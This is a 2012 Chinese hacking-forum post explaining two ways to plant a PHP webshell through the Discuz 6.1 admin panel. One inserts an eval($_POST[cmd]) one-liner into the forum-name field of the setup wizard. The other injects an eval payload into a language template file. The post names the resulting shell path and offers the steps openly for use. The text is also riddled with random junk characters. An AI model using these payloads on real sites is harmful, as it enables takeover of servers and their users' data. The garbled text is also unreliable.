找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2345|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell
9 ^8 A$ [7 k/ z, C& m. d好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下+ [" R  w0 Y2 L6 {, B
1:  ~* h/ I' c+ Z6 w0 }
http://127.0.0.1/discuz/admincp. ... zard&frames=yes1 k9 g. u% o% k; Q7 k& s
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell5 f' L2 _. X( ?+ G+ [! D; e( w
<?php eval($_POST[cmd]);?>/ a; x" t: M" U8 @7 C. b
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
& l' o- z2 o) B- \2 ?& {- G( x" X" r( e  f, z) E0 [) [
9 G2 ?6 n7 J4 u* q
2:后台模板管理--默认模板套系--详情
/ T! ^; H7 X$ O* R5 ytemplates/default/actions.lang.php
6 p& H, n' s$ Xjhackj\\');eval($_POST[cmd])?>;//' `. R7 K+ m( ]

6 _/ z: s# a- V+ @* P利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表